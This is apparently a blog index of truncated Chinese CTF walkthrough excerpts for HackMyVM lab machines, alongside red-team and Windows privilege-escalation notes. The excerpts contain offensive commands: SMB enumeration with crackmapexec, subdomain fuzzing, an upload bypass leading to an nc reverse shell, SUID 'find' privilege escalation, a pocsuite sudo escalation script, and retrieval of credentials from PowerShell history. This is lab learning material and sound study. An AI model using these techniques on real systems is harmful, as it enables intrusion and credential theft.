hackmyvm_dc01
操作系统:Windows(域控服务器,主机名:DC01)开放端口和服务:53 - DNS88 - Kerberos(认证服务)135 - RPC139/445 - SMB(文件共享)389/3268 - LDAP(AD 目录服务)464 - Kerberos密码修改593 - RPC over HTTP636/3269 - LDAPS(加密LDAP)其他信息:域名是:SOUPEDECODE.LOCALSMB要求签名(意味着直接pass-the-hash/relay SMB攻击受限)时间存在时钟偏移(+15小时) 先给域名加入hosts文件 然后收集smb信息 crackmapexec smb 192.168.56.128 -u '' -p '' --sharescrackmapexec smb 192.168.56.128 -u 'anonymous' -p '' --sharescrackmapexec smb 192.168.56.128 -u 'guest' -p...
hackmyvm_always
寻找靶机+初步扫描 ┌──(root㉿kali)-[~]└─# nmap -sV -sC 192.168.106.135 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 09:03 EDTNmap scan report for 192.168.106.135Host is up (0.00037s latency).Not shown: 987 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd| ftp-syst: |_ SYST: Windows_NT22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)135/tcp ...
hackmyvm_Principle
寻找存活靶机: 看一下web服务 简单的一个nginx欢迎页面 扫到robots.txt 三个路径分别去访问 按照提示去扫目录 扫到 得到子域名T4L0S.HMV 放入hosts文件 去访问 提示我们还有子域 枚举 ffuf -u http://t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 615 也加进hosts文件中 证明了我们方向是对的 接下来扫一下目录得到upload.php 改掉MIME类型即可上传根据返回包判断出文件路径 直接nc弹shell即可 suid find提权 find . -exec /bin/sh -p \; -quit 根据十二神的姓名查找文件 for line in $(cat name.txt); do find / -iname *$line* 2>/dev/null;...
hackmyvm_KrustyKrab
踩点 80端口访问是一个Apache 默认页 在源码中得到 /var/www/html/finexo 访问finexo 有登录功能 第一个用户存在 在登录页面的源码中发现js文件 很明显的jsfuck 解出 function generateCaptcha() { $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $code = ""; $seed = time(); mt_srand($seed); for ($i = 0; $i < 4; $i++) { $code .= $characters[mt_rand(0, strlen($characters) - 1)]; } $_SESSION['captcha'] = strtolower($code); ...
hackmyvm_reversteg
扫描 80的的源码发现 117db0148dc179a2c2245c5a30e63ab0 根据提示是一张图片 加上jpg即可 图片用随波逐流直接梭 morainelake为steghide密码 提取出的压缩包密码也是morainelake ┌──(root㉿kali)-[/myift/reversbeg]└─# steghide extract -sf 1.jpg --passphrase morainelake wrote extracted data to "secret.zip".┌──(root㉿kali)-[/myift/reversbeg]└─# ls1.jpg secret.zip┌──(root㉿kali)-[/myift/reversbeg]└─# unzip secret.zip Archive: secret.zip creating: secret/[secret.zip] secret/secret.txt password: extracting: secret/secret.txt ...
hackmyvm_Pycrt
扫描 80端口只有一个默认的apache页面没有扫描出其他的页面 但是 端口6667有个IRC服务(互联网中继聊天服务) 我们nc连接并发送一些标准的IRC命令来注册你的昵称和用户信息 ┌──(root㉿kali)-[~]└─# nc 192.168.56.106 6667:irc.local NOTICE * :*** Looking up your hostname...NICK kali_pentester:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.103) instead.USER kali 0 * :Kali Pentester:irc.local 001 kali_pentester :Welcome to the Localnet IRC Network kali_pentester!kali@192.168.56.103:irc.local 002 kali_pentester...
box
ysper牌靶机自制靶机 - Ysper_1 爆破邮箱密码 爆破后在里面找到第一个flag 然后利用爆出的密码1q2w3e4r 去进行smb faker访问 下载源码smb: \> recurse ONsmb: \> prompt OFFsmb: \> mget * 源码中找到 拿到shell 数据库中有flag 数据库密码为root在源码config文件中也可找到 sudo -l发现faker权限的pocsuite 提权到faker cat << 'EOF' > /tmp/e.pyfrom pocsuite3.api import Output, POCBase, register_pocimport osclass POC(POCBase): vulID = "faker-001" # 随便写一个ID version = "1.0" author = "chatgpt" vulDate =...
红队学习笔记-one
红队基础知识漏洞评估和渗透测试限制漏洞评估这是最简单的安全评估形式,其主要目标是在网络中尽可能多的系统中识别尽可能多的漏洞。为此,可以做出让步以有效地实现这一目标。例如,攻击者的计算机可能在可用的安全解决方案中被列入允许列表,以避免干扰漏洞发现过程。这是有道理的,因为目标是查看网络上的每台主机并单独评估其安全状况,同时向公司提供关于修复工作重点的最多信息。 总而言之, 漏洞评估的重点是将主机作为单个实体进行漏洞扫描,以便识别安全缺陷并部署有效的安全措施,以优先方式保护网络。大部分工作可以使用自动化工具完成,并由作员执行,不需要太多的技术知识。 例如,如果要通过网络运行漏洞评估...
win提权
win的提权从通常的位置收集密码远程连接纯命令行 xfreerdp xfreerdp /v:<远程IP> /u:<用户名> /p:<密码> 界面 remmina Powershell历史每当用户使用 Powershell 运行命令时,它都会存储到一个文件中,该文件会保留过去命令的内存。这对于快速重复您之前使用的命令非常有用。如果用户在 Powershell 命令行中直接运行包含密码的命令,则稍后可以从 cmd.exe提示符中使用以下命令检索该密码: type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt%userprofile%这是 Windows 的环境变量,表示当前用户的主目录(Home 目录)。如果要在powershell执行命令我们要把%userprofile%换为$Env:userprofile 保存的 Windows 凭据Windows...